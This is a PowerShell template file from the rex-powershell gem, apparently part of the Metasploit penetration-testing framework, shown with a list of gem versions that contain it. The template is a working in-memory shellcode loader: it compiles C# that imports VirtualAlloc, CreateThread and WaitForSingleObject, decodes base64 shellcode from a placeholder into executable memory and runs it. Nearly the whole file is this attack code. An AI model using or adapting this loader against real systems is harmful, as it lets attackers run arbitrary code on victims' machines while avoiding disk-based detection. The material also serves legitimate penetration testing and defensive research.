Contents

Set-StrictMode -Version 2
$%{var_syscode} = @"
	using System;
	using System.Runtime.InteropServices;
	namespace %{var_kernel32} {
		public class func {
			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
		}
	}
"@

$%{var_codeProvider} = New-Object Microsoft.CSharp.CSharpCodeProvider
$%{var_compileParams} = New-Object System.CodeDom.Compiler.CompilerParameters
$%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})

[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")

$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }
[System.Runtime.InteropServices.Marshal]::Copy($%{var_code}, 0, $%{var_baseaddr}, $%{var_code}.Length)
[IntPtr] $%{var_threadHandle} = [%{var_kernel32}.func]::CreateThread(0,0,$%{var_baseaddr},0,0,0)
if ([Bool]!$%{var_threadHandle}) { $global:result = 7; return }
$%{var_temp} = [%{var_kernel32}.func]::WaitForSingleObject($%{var_threadHandle}, [%{var_kernel32}.func+Time]::Infinite)

Version data entries

27 entries across 27 versions & 1 rubygems

Version	Path
rex-powershell-0.1.91	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.90	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.89	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.88	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.87	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.86	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.85	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.84	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.83	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.82	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.81	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.80	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.79	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.78	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.77	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.76	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.75	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.74	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.73	data/templates/to_mem_dotnet.ps1.template
rex-powershell-0.1.72	data/templates/to_mem_dotnet.ps1.template